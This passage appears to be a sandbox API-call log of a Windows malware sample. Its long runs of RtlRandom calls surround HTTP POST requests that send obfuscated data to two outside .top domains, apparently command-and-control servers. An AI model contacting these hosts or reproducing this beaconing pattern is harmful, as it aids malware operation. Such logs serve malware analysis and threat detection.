Seed=0x2830e9e) returned 0x4cb8af6d [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb353ac67 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8e40acb1 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb08aa6b9 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9fa23ca7 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf7b4932e [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1f4e16b3 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1c0477f8 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe9518756 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa1f91891 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x52bf996 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfc5aaefe [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaf199a56 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf8d5643a [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe804f2ab [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5a3d836c [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x43abce26 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3861e0f7 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x49877343 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc169b8cf [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x311033ba [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x13a97284 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8d14a5a6 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x22210f5 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x126ad2d9 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcd3ba7a3 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfd5399f0 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe4587f36 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd0bc0329 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf1c554a7 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x484b624 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdf6bc118 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa840ffb2 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf16e1246 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc46711fe [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x682f72a [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6875bd53 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa98cb2c8 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa75893c4 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x24815ab9 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xec85a960 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb39e73ff [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7d114c04 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x496306f0 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x49723f96 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3d044704 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x84ddf0b0 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x10eaf84b [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1a5f520f [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd4f99a94 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4ed9b6ec [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x542c356f [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x66697c08 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3769f942 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x59e91a93 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x64a404c2 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9af81d44 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x79028bfd [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc89da860 [0127.302] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc34eb9ea [0127.302] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0xb0) returned 0x98818e0 [0127.303] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0127.303] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0127.303] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0127.303] lstrcatA (in: lpString1="", lpString2="5bFC`2T7A/68?Ab;lU$]>Jm!(QN?RZ0bVq:9IH-SqaR]#f0z#Mii#Ps\\/Ta*7`:*Oaof2L+zj!O*,v@-10X$M;zH@x9ME``" | out: lpString1="`+Nm%\"Jle94ky7Le.'km!2E7_Zh-'-5'TxuMwp$D1Vvh\")43=w21i#Ps\\/Ta*7`:*Oaof2L+zj!O*,v@-10X$M;zH@x9ME``") returned="`+Nm%\"Jle94ky7Le.'km!2E7_Zh-'-5'TxuMwp$D1Vvh\")43=w21i#Ps\\/Ta*7`:*Oaof2L+zj!O*,v@-10X$M;zH@x9ME``" [0127.859] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10c) returned 0x9881a20 [0127.859] lstrlenA (lpString="http://nityanneron5.top/") returned 24 [0127.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9881840, cbMultiByte=25, lpWideCharStr=0x9881a20, cchWideChar=50 | out: lpWideCharStr="http://nityanneron5.top/") returned 25 [0127.859] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x109efc18 | out: pProxyConfig=0x109efc18) returned 1 [0127.871] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x9d44070 [0127.871] WinHttpCrackUrl (in: pwszUrl="http://nityanneron5.top/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x109efcd0 | out: lpUrlComponents=0x109efcd0) returned 1 [0127.871] WinHttpConnect (hSession=0x9d44070, pswzServerName="nityanneron5.top", nServerPort=0x50, dwReserved=0x0) returned 0xad54790 [0127.871] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x12) returned 0x9881b40 [0127.871] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x68) returned 0x9881b60 [0127.871] WinHttpOpenRequest (hConnect=0xad54790, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x9d5a210 [0127.871] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x3a) returned 0x9881bd0 [0127.871] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10d) returned 0x9881c20 [0127.871] wsprintfW (in: param_1=0x9881c20, param_2="Accept: */*\r\nReferer: %S" | out: param_1="Accept: */*\r\nReferer: http://nityanneron5.top/") returned 46 [0127.871] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881bd0) returned 1 [0127.871] WinHttpAddRequestHeaders (hRequest=0x9d5a210, pwszHeaders="Accept: */*\r\nReferer: http://nityanneron5.top/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0127.871] WinHttpSendRequest (hRequest=0x9d5a210, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9881920*, dwOptionalLength=0xe0, dwTotalLength=0xe0, dwContext=0x0) returned 0 [0127.880] WinHttpCloseHandle (hInternet=0x9d5a210) returned 1 [0127.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881c20) returned 1 [0127.880] WinHttpCloseHandle (hInternet=0xad54790) returned 1 [0127.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881b60) returned 1 [0127.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881b40) returned 1 [0127.881] WinHttpCloseHandle (hInternet=0x9d44070) returned 1 [0127.881] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881a20) returned 1 [0127.881] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881870) returned 1 [0127.881] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881920) returned 1 [0127.881] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x20) returned 0x9881840 [0127.881] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3169e0 [0127.881] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x6c) returned 0x9881870 [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9636f3cb [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x902e71cd [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc4dda06d [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc33e60c7 [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb784dce1 [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf5a667f3 [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x866b3efb [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x47d90755 [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x312ae780 [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe6b0efdd [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6e896888 [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x271a3ad4 [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x660d870c [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7c82e405 [0127.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4358cd4e [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7bdd975d [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2cfb9aab [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7b7dc0c6 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x75257ff3 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6a231899 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe24c6c [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x479b5daa [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb0d727fb [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xece8becb [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8fbe39cc [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x20f7c307 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5f23b4ea [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x609bb04c [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x957c82ff [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbc51eaf1 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc65f6d35 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc75136fc [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2426432e [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfdbe0fac [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6478a1e9 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x678c233f [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6018b3b0 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcffe4aa5 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbbb896af [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc06769c9 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3b1c954c [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa36481f8 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x64518493 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf6dab123 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcd747252 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaeaf9dbb [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x66dfdcc4 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xba9de951 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x55aa5b8c [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xed9f393f [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5f27ae97 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x906ead0 [0127.882] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8d579467 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9345d441 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x956703fa [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf74acabd [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe689fa7e [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7cead346 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x33ca2257 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x981ab4cd [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbde7f97a [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5f7c1d56 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd2b70f7a [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeb2b83f7 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x59c84ba5 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd4750e8e [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbea6b45f [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe817c98e [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9775a4aa [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x76330fb7 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x78af8f21 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6a404db9 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x48fd0145 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7dc14cc6 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xce169d38 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbae3d5da [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbad7e67a [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x949f8410 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2ed9c7a9 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf4699861 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa3613254 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9737dcf8 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xed2f4d67 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa88a68c0 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4100afcf [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6aa27b03 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5124f360 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x14901dd6 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb9818fca [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x417a0671 [0127.883] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe795c068 [0127.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa724df31 [0127.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x16fc43db [0127.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x63290f4 [0127.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1eef9d55 [0127.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x271c9bb3 [0127.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa1fe5489 [0127.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7eb7d0e5 [0127.884] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfdbe3ea [0127.884] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0xbb) returned 0x98818f0 [0127.884] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0127.884] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0127.884] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0127.884] lstrcatA (in: lpString1="", lpString2="bLhx:F\\b!,sqU(o`&G>BS9rT9\"C)jfbO7]zhI:r@igX@U`cZ'6*U\\.g(Gu\\V;%q,4S^yA(TZDUEaoS\"jaM\\AVO^i-IJxP!Vc1-a8Aq`+g.rbC,.u+'?/(ge^lahL-g,[Ii@qusIH&1M9!U(Ip+b4N/$sOHOTuKkjk5.*c/w&:NdymBe+VO^i-IJxP!Vc1-a8Aq`+g.rbC,.u+'?/(ge^lahL-g,[Ii@qusIH&1M9!U(Ip+b4N/$sOHOTuKkjk5.*c/w&:NdymBe+VO^i-IJxP!Vc1-a8Aq`+g.rbC,.u+'?/(ge^lahL-g,[Ii@qusIH&1M9!U(Ip+b4N/$sOHOTuKkjk5.*c/w&:NdymBe+>irxzfs)Aq=YYMjrlN+6E:ybY;9wTE7$bA2x?9@#]loNDilmQ`Jhfo&c(#WbyHLd.Le]N" | out: lpString1="zF:&sZJw&EG826fg'1!a?-7Bzyx9W!\"b1@<,`$:hi!_C\"BW(*h]!?RzuSzKA'@0Y;rFQg>>irxzfs)Aq=YYMjrlN+6E:ybY;9wTE7$bA2x?9@#]loNDilmQ`Jhfo&c(#WbyHLd.Le]N") returned="zF:&sZJw&EG826fg'1!a?-7Bzyx9W!\"b1@<,`$:hi!_C\"BW(*h]!?RzuSzKA'@0Y;rFQg>>irxzfs)Aq=YYMjrlN+6E:ybY;9wTE7$bA2x?9@#]loNDilmQ`Jhfo&c(#WbyHLd.Le]N" [0132.639] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10c) returned 0x9881b00 [0132.639] lstrlenA (lpString="http://sadineyalas8.top/") returned 24 [0132.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9881840, cbMultiByte=25, lpWideCharStr=0x9881b00, cchWideChar=50 | out: lpWideCharStr="http://sadineyalas8.top/") returned 25 [0132.639] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x109efc18 | out: pProxyConfig=0x109efc18) returned 1 [0132.733] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x9d44070 [0132.733] WinHttpCrackUrl (in: pwszUrl="http://sadineyalas8.top/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x109efcd0 | out: lpUrlComponents=0x109efcd0) returned 1 [0132.733] WinHttpConnect (hSession=0x9d44070, pswzServerName="sadineyalas8.top", nServerPort=0x50, dwReserved=0x0) returned 0xad54790 [0132.733] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x12) returned 0x9881c20 [0132.733] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x68) returned 0x9881c40 [0132.733] WinHttpOpenRequest (hConnect=0xad54790, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x9d5b890 [0132.733] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x3a) returned 0x9881cb0 [0132.733] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10d) returned 0x9881d00 [0132.733] wsprintfW (in: param_1=0x9881d00, param_2="Accept: */*\r\nReferer: %S" | out: param_1="Accept: */*\r\nReferer: http://sadineyalas8.top/") returned 46 [0132.733] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881cb0) returned 1 [0132.733] WinHttpAddRequestHeaders (hRequest=0x9d5b890, pwszHeaders="Accept: */*\r\nReferer: http://sadineyalas8.top/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0132.733] WinHttpSendRequest (hRequest=0x9d5b890, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9881990*, dwOptionalLength=0x15b, dwTotalLength=0x15b, dwContext=0x0) returned 0 [0132.880] WinHttpCloseHandle (hInternet=0x9d5b890) returned 1 [0132.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881d00) returned 1 [0132.880] WinHttpCloseHandle (hInternet=0xad54790) returned 1 [0132.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881c40) returned 1 [0132.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881c20) returned 1 [0132.880] WinHttpCloseHandle (hInternet=0x9d44070) returned 1 [0132.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881b00) returned 1 [0132.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881870) returned 1 [0132.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881990) returned 1 [0132.880] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0132.880] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x22) returned 0x9881840 [0132.880] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.880] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc9860025 [0132.881] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x115) returned 0x9881870 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2c619b0d [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc1d35966 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x40bd05c4 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xff790648 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x124cd12a [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdf325317 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6a3645b [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x90a83916 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc6992d84 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf9e00313 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x381ba3ba [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x13b6e00e [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9054e4a1 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe7b0e6a9 [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8101f09d [0132.881] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6dd06c17 